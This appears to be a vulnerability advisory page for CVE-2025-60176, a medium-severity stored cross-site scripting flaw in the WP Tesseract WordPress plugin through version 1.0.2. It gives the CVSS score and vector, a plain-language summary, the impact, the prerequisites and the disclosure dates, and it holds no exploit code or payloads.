CVE-2025-60176 MEDIUM

CVE-2025-60176: WordPress WP Tesseract Plugin <= 1.0.2 - Cross Site Scripting (XSS) Vulnerability

Vendor Tattersoftware
Product WP Tesseract
Weakness CWE-79 · XSS
Published October 22, 2025
Last update April 28, 2026

CVSS base score

5.9/10
Attack vector Network
Attack complexity Low
Privileges required High
User interaction Required
Confidentiality Low
Integrity Low

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

What the vulnerability does

01Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in tattersoftware WP Tesseract wp-tesseract allows Stored XSS.This issue affects WP Tesseract: from n/a through <= 1.0.2.

Explanation of Vulnerability in Simple Terms

02Summary

WP Tesseract versions 1.0.2 and earlier contain a cross-site scripting (XSS) vulnerability that allows authenticated administrators to inject malicious scripts. The vulnerability requires an admin to visit a crafted page or link, and the injected code executes in the context of other users' browsers. This can lead to unauthorized actions, data theft, or further compromise of the WordPress site.

What an attacker can do

03Attacker Capabilities

Inject malicious JavaScript that executes in other users' browsers when they visit the site.

Potential impact on your site

04Site Impact

An admin account could be compromised to inject scripts affecting all site visitors, leading to data theft or malware distribution.

Conditions required to exploit

05Prerequisites

Attacker must have administrator privileges and trick an admin into visiting a malicious link or page.

Key dates

06Disclosure timeline

October 22, 2025 CVE published
April 28, 2026 Record updated